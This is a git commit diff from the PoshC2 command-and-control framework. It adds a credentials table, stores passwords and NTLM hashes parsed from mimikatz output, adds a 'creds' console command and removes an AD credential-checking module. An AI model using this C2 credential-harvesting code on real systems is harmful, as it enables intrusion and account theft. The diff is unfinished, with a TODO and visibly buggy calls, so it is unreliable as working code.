temp
m0rv4i 2019-04-18 17:48:30 +01:00
parent cb7b48e9a0
commit c5667775c8
7 changed files with 95 additions and 57 deletions

View File

@ -103,7 +103,6 @@ def run_autoloads(command, randomuri, user):
if "set-lhstokenprivilege" in command.lower(): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user)
if "sharpsocks" in command.lower(): check_module_loaded("SharpSocks.ps1", randomuri, user)
if "find-allvulns" in command.lower(): check_module_loaded("Sherlock.ps1", randomuri, user)
if "test-adcredential" in command.lower(): check_module_loaded("Test-ADCredential.ps1", randomuri, user)
if "new-zipfile" in command.lower(): check_module_loaded("Zippy.ps1", randomuri, user)
if "get-netuser" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)
if "invoke-aclscanner" in command.lower(): check_module_loaded("powerview.ps1", randomuri, user)

27
DB.py
View File

@ -60,7 +60,7 @@ def initializedb():
credsID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
Username TEXT,
Password TEXT,
Hash TEXT);"""
IS_Hash TEXT);"""
create_c2server = """CREATE TABLE C2Server (
ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
@ -92,7 +92,7 @@ def initializedb():
create_history = """CREATE TABLE History (
ID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
Command TEXT);"""
conn = sqlite3.connect(Database)
c = conn.cursor()
@ -250,6 +250,29 @@ def get_implantdetails(randomuri):
else:
return None
def get_allcreds():
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute("SELECT * FROM Creds")
return c.fetchall()
def get_creds_for_user(user):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute("SELECT * FROM Creds WHERE Username=?", (user,))
return c.fetchall()
def insert_cred(user, password, is_hash):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute("SELECT * FROM Creds WHERE Username=? AND Password=? AND Is_Hash=?", (user, password, is_hash))
if not c.fetchone():
c.execute("INSERT INTO Creds (Username, Password, Is_Hash) VALUES (?, ?, ?)", (user, password, is_hash))
conn.commit()
def get_hostdetails(implant_id):
conn = sqlite3.connect(Database)
conn.row_factory = sqlite3.Row

View File

@ -401,7 +401,7 @@ turnon-notifications
turnoff-notifications
listmodules
pwnself (alias: p)
creds -action <dump/add/del/search> -username <username> -password/-hash
creds -action <dump/add/del/search> -username <username> -password/-hash <password/hash>
createnewpayload
createproxypayload
createdaisypayload

View File

@ -4,7 +4,7 @@ import sys, re, os, time, subprocess, traceback, signal, argparse, readline
from sqlite3 import Error
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
from DB import get_newimplanturl, get_implantbyid, new_task, get_implants, get_history_dict, get_lastcommand
from DB import get_newimplanturl, get_implantbyid, new_task, get_implants, get_history_dict, get_lastcommand, get_allcreds, insert_cred
from DB import new_commandhistory, get_c2urls, del_autorun, del_autoruns, add_autorun, get_autorun, get_newtasks_all
from DB import drop_newtasks, get_implanttype, update_label, update_sleep, get_history, kill_implant, unhide_implant
from DB import get_pid, get_allurls, get_sharpurls, get_randomuri, get_hostdetails, select_item
@ -17,6 +17,7 @@ from Utils import validate_sleep_time, randomuri
from PyHandler import handle_py_command
from SharpHandler import handle_sharp_command
from PSHandler import handle_ps_command
from tabulate import tabulate
if os.name == 'nt':
import pyreadline.rlmain
@ -58,6 +59,10 @@ def process_mimikatzout(current):
current[f] = ''
if current['Username'] != '' and (current['Password'] != '' or current['NTLM'] != ''):
if current['Password']:
insert_cred(current['Username'], current['Password'], False)
if current['NTLM']:
insert_cred(current['Username'], current['NTLM'], True)
return current['Username'], current['Password'], current['NTLM']
def createproxypayload(user, startup):
@ -239,11 +244,13 @@ def startup(user, printhelp = ""):
new_commandhistory(implant_id)
except Exception as e:
pass
implant_id = implant_id.lower().strip()
if (implant_id == "") or (implant_id.lower() == "back") or (implant_id.lower() == "clear"):
if (implant_id == "") or (implant_id == "back") or (implant_id == "clear"):
startup(user)
if "output-to-html" in implant_id.lower():
if "output-to-html" in implant_id:
generate_table("Tasks")
generate_table("C2Server")
generate_table("Creds")
@ -251,51 +258,51 @@ def startup(user, printhelp = ""):
graphviz()
time.sleep(1)
startup(user)
if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()):
if ("show-urls" in implant_id) or ("list-urls" in implant_id):
urls = get_c2urls()
urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n"
for i in urls:
urlformatted += "%s %s %s %s %s %s %s %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7])
startup(user, urlformatted)
if "add-autorun" in implant_id.lower():
autorun = (implant_id.lower()).replace("add-autorun ","")
if "add-autorun" in implant_id:
autorun = (implant_id).replace("add-autorun ","")
autorun = autorun.replace("add-autorun","")
add_autorun(autorun)
startup(user, "add-autorun: %s\r\n" % autorun)
if "list-autorun" in implant_id.lower():
if "list-autorun" in implant_id:
autoruns = get_autorun()
startup(user, autoruns)
if "del-autorun" in implant_id.lower():
autorun = (implant_id.lower()).replace("del-autorun ","")
if "del-autorun" in implant_id:
autorun = (implant_id).replace("del-autorun ","")
del_autorun(autorun)
startup(user, "deleted autorun\r\n")
if "nuke-autorun" in implant_id.lower():
if "nuke-autorun" in implant_id:
del_autoruns()
startup(user, "nuked autoruns\r\n")
if (implant_id.lower() == "automigrate-frompowershell") or (implant_id.lower() == "am"):
if (implant_id == "automigrate-frompowershell") or (implant_id == "am"):
startup(user, "automigrate not currently implemented for the Python version of PoshC2\r\n")
if "show-serverinfo" in implant_id.lower():
if "show-serverinfo" in implant_id:
i = get_c2server_all()
detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\n%sSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s" % (i[1],i[2],i[3],i[4],i[5],i[6],i[7],i[8],i[9],i[10],i[11],i[12],i[13],i[14],i[15],i[16],i[17],i[18],i[19],i[20],i[21],i[22],i[23],i[24])
startup(user, detailsformatted)
if "turnoff-notifications" in implant_id.lower():
if "turnoff-notifications" in implant_id:
update_item("EnableNotifications", "C2Server", "No")
startup(user, "Turned off notifications on new implant")
if "turnon-notifications" in implant_id.lower():
if "turnon-notifications" in implant_id:
update_item("EnableNotifications", "C2Server", "Yes")
startup(user, "Turned on notifications on new implant")
if "set-clockworksmsapikey" in implant_id.lower():
cmd = (implant_id.lower()).replace("set-clockworksmsapikey ","")
if "set-clockworksmsapikey" in implant_id:
cmd = (implant_id).replace("set-clockworksmsapikey ","")
cmd = cmd.replace("set-clockworksmsapikey","")
update_item("MobileNumber", "C2Server", cmd)
startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd)
if "set-clockworksmsnumber" in implant_id.lower():
cmd = (implant_id.lower()).replace("set-clockworksmsnumber ","")
if "set-clockworksmsnumber" in implant_id:
cmd = (implant_id).replace("set-clockworksmsnumber ","")
cmd = cmd.replace("set-clockworksmsnumber","")
update_item("APIKEY", "C2Server", cmd)
startup(user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd)
if "set-defaultbeacon" in implant_id.lower():
new_sleep = (implant_id.lower()).replace("set-defaultbeacon ","")
if "set-defaultbeacon" in implant_id:
new_sleep = (implant_id).replace("set-defaultbeacon ","")
new_sleep = new_sleep.replace("set-defaultbeacon","")
if not validate_sleep_time(new_sleep):
print(Colours.RED)
@ -306,7 +313,7 @@ def startup(user, printhelp = ""):
update_item("DefaultSleep", "C2Server", new_sleep)
startup(user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep)
if "opsec" in implant_id.lower():
if "opsec" in implant_id:
implants = get_implants_all()
comtasks = get_tasks()
hosts = ""
@ -339,27 +346,47 @@ def startup(user, printhelp = ""):
filehash = uploadedfile.partition(" with md5sum:")[2].strip()
uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip()
uploadedfile = uploadedfile.strip('"')
uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile)
uploads += "%s\t\t%s\t\t%s\n" % (hostname[3], filehash, uploadedfile)
if "installing persistence" in t[4].lower():
hostname = get_implantdetails(t[2])
line = t[4].replace('\n','')
line = line.replace('\r','')
filenameuploaded = line.rstrip().split(":",1)[1]
uploads += "%s %s \n" % (hostname[3], filenameuploaded)
uploads += "%s\t\t%s\t\t%s\n" % (hostname[3], filehash, filenameuploaded)
startup(user, "Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes))
if "listmodules" in implant_id.lower():
if "listmodules" in implant_id:
mods = ""
for modname in os.listdir("%s/Modules/" % POSHDIR):
mods += "%s\r\n" % modname
startup(user, mods)
if "creds" in implant_id.lower():
startup(user, "creds module not implemented yet")
if "creds" in implant_id:
if "creds" == implant_id:
all_creds = get_allcreds()
creds_print = []
for cred in all_creds:
is_hash = "Y"
if cred['Is_Hash'] == '0':
is_hash = "N"
creds_print.append([cred['Username'], cred['Password'], is_hash])
print tabulate([["Username", "Password", "Is Hash"]].append(creds_print), tablefmt="pipe")
startup(user, tabulate([["Username", "Password", "Is Hash"]].append(creds_print), tablefmt="pipe"))
if implant_id.startswith("creds -action add"):
args = implant_id.replace("creds -action add", "").strip().split()
username = None
password = None
is_hash = None
#TODO
if username is None or password is None or is_hash is None:
startup("Missing argument - format is: creds -action <dump/add/del/search> -username <username> -password/-hash <password/hash>")
insert_cred(username, password, is_hash)
startup(user, "Credential added")
if (implant_id.lower() == "pwnself") or (implant_id.lower() == "p"):
if (implant_id == "pwnself") or (implant_id == "p"):
subprocess.Popen(["python", "%s%s" % (PayloadsDirectory, "py_dropper.py")])
startup(user)
if (implant_id.lower() == "tasks") or (implant_id.lower() == "tasks "):
if (implant_id == "tasks"):
alltasks = ""
tasks = get_newtasks_all()
if tasks is None:
@ -370,11 +397,11 @@ def startup(user, printhelp = ""):
alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
startup(user, "Queued tasks:\r\n\r\n%s" % alltasks)
if (implant_id.lower() == "cleartasks") or (implant_id.lower() == "cleartasks "):
if (implant_id == "cleartasks"):
drop_newtasks()
startup(user, "Empty tasks queue\r\n")
if "quit" in implant_id.lower():
if "quit" in implant_id:
ri = raw_input("Are you sure you want to quit? (Y/n) ")
if ri.lower() == "n":
startup(user)
@ -383,22 +410,22 @@ def startup(user, printhelp = ""):
if ri.lower() == "y":
sys.exit(0)
if "createdaisypayload" in implant_id.lower():
if "createdaisypayload" in implant_id:
createdaisypayload(user, startup)
if "createproxypayload" in implant_id.lower():
if "createproxypayload" in implant_id:
createproxypayload(user, startup)
if "createnewpayload" in implant_id.lower():
if "createnewpayload" in implant_id:
createnewpayload(user, startup)
if (implant_id == "?") or (implant_id == "help"):
startup(user, pre_help)
if (implant_id.lower() == "history") or implant_id.lower() == "history ":
if (implant_id == "history") or implant_id == "history ":
startup(user, get_history())
if "use " in implant_id.lower():
if "use " in implant_id:
implant_id = implant_id.replace("use ","")
params = re.compile("use ", re.IGNORECASE)
implant_id = params.sub("", implant_id)
@ -423,7 +450,7 @@ def runcommand(command, randomuri):
new_commandhistory(command)
else:
new_commandhistory(command)
except Exception as e:
except Exception:
pass
implant_type = get_implanttype(randomuri)
@ -446,7 +473,7 @@ def commandloop(implant_id, user):
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
if ("-" in implant_id.lower()) or ("all" in implant_id.lower()) or ("," in implant_id.lower()):
if ("-" in implant_id) or ("all" in implant_id) or ("," in implant_id):
print (Colours.GREEN)
command = raw_input("%s> " % (implant_id))
else:
@ -466,7 +493,7 @@ def commandloop(implant_id, user):
command = raw_input("%s> " % (implant_id))
# if "all" run through all implants get_implants()
if implant_id.lower() == "all":
if implant_id == "all":
if command == "back":
startup(user)
implant_split = get_implants()
@ -486,7 +513,7 @@ def commandloop(implant_id, user):
try:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)
except Exception as e:
except Exception:
print ("Unknown ImplantID")
# else run against single uri
else:

View File

@ -1,12 +0,0 @@
 Function Test-ADCredential
{
Param($username, $password, $domain)
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
$pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain)
$object = New-Object PSObject | Select Username, Password, IsValid
$object.Username = $username;
$object.Password = $password;
$object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
return $object
}

View File

@ -8,7 +8,7 @@ Rework imports to improve dependency management
Break up ImplantHandler into PSHandler.py, PyHandler.py and SharpHandler.py
Add ability to upload a file to an ADS
Update BloodHound
Pull out unpatched payloads into file for easy management
Pull out unpatched payloads into files for easy management
Add base64 encoded versions of the shellcode to the payloads directory
Add a configurable jitter to all implants
Update the notifications config if it is changed in the Config.py

View File

@ -2,4 +2,5 @@ pyopenssl
pandas
pyttsx3
pycrypto
pyreadline
pyreadline
tabulate